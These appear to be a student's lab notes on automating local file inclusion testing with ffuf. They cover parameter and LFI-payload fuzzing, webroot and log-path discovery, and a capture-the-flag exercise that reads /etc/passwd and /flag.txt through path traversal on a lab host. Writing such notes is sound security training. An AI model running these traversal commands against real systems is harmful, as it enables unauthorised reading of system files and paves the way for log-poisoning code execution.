# Intro - It is crucial to understand how file inclusion attacks work and how we can manually craft advanced payloads and use custom techniques to reach remote code execution - This is because in many cases, for us to exploit the vulnerability, it may require a custom payload that matches its specific configs or bypasses WAF filters - Nonetheless, there are many automated methods that can help us quickly identify and exploit trivial LFI vulnerabilities - We can utilize fuzzing tools to test a huge list of common LFI payloads and see if any of them work, or we can utilize specialized LFI tools to test for such vulnerabilities # Fuzzing Parameters - While HTML forms may be well tested and secured, the page may expose other parameters unrelated to HTML forms that a normal user would never access - This is why it may be important to fuzz for exposed parameters, as they tend not to be as secure as public ones ## Fuzz for Common GET Parameters - Use the `burp-parameter-name.txt` wordlist in `seclists/Discovery/Web-Content/burp-parameter-names.txt` ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287 ``` - Once we identify an exposed parameter that isn't linked to any forms we tested, we can perform all of the LFI tests discussed in this module ## LFI Wordlists - While manual testing is more reliable to discover LFI vulns, in many cases, we may want to run a quick test on a parameter to see if it is vulnerable to any common LFI payload, which may save us time in web apps where we need to test for various vulns - There are a number of [LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) we can use for this scan - A good wordlist is [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt), as it contains various bypasses and common files, so it makes it easy to run several tests at once - We can use this wordlist to fuzz the `?language=` parameter we have been testing throughout the module, as follows ```bash ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287 ``` # Fuzzing Server Files - In addition to fuzzing LFI payloads, there are different server files that may be helpful in our LFI exploitation, so it would be helpful to know where such files exist and whether we can read them - Such files include:  - `Server webroot path` - `server configurations file` - `server logs` ## Server Webroot - We may need to know the full server webroot path to complete our exploitation in some cases - For example, if we wanted to locate a file we uploaded, but we cannot reach its `/uploads` directory through relative paths (e.g. `../../uploads`) - In such cases, we may need to figure out the server webroot path so that we can locate our uploaded files through absolute paths instead of relative paths - To do so, we can fuzz for the `index.php` file through common webroot paths, which we can find in this [wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) or this [wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt) - Depending on our LFI situation, we may need to add a few back directories (e.g. `../../../../`), and then add our `index.php` afterwards ```bash ffuf -w /usre/share/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287 ``` ## Server Logs/Configs - We need know the correct logs directory to be able to perform the log poisoning attacks we discussed - Furthermore, as we just discussed, we may also need to read the server configurations to be able to identify the server webroot path and other important information (like the logs path!) - To do so, we may also use the [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt) wordlist, as it contains many of the server logs and configuration paths we may be interested in - If we wanted a more precise scan, we can use this [wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux) or this [wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows), though they are not part of `seclists`, so we need to download them first ```bash ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287 ``` - As we can see, the scan returned over 60 results, many of which were not identified with the [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt) wordlist, which shows us that a precise scan is important in certain cases - Now, we can try reading any of these files to see whether we can get their content. We will read (`/etc/apache2/apache2.conf`), as it is a known path for the apache server configuration: ```bash curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf ``` # LFI - The most common LFI tools are [LFISuite](https://github.com/D35m0nd142/LFISuite), [LFiFreak](https://github.com/OsandaMalith/LFiFreak), and [liffy](https://github.com/mzfr/liffy). We can also search GitHub for various other LFI tools and scripts, but in general, most tools perform the same tasks, with varying levels of success and accuracy. - Unfortunately, most of these tools are not maintained and rely on the outdated `python2`, so using them may not be a long term solution # Exercise - ping test ![[images/Pasted image 20251220205908.png]] - nmap scan ![[images/Pasted image 20251220205944.png]] - visit page - no language picker ![[images/Pasted image 20251220205932.png]] - FUZZ for common GET parameters ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://94.237.56.175:55371/index.php?FUZZ=value' -fs 2309 ``` ![[images/Pasted image 20251220210234.png]] - Run an LFI wordlist ```bash ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.56.175:55371/index.php?view=FUZZ' -fs 1935 ``` - Looks like we can read arbitrary files with a sufficient number of `../` ![[images/Pasted image 20251220210401.png]] - try to `curl` on `/etc/passwd` ![[images/Pasted image 20251220210731.png]] - now try to `curl` on `/flag.txt` ```bash curl http://94.237.56.175:55371/index.php?view=../../../../../../../../../../../../../../../../../../../../../../../../../flag.txt ``` ![[images/Pasted image 20251220211617.png]]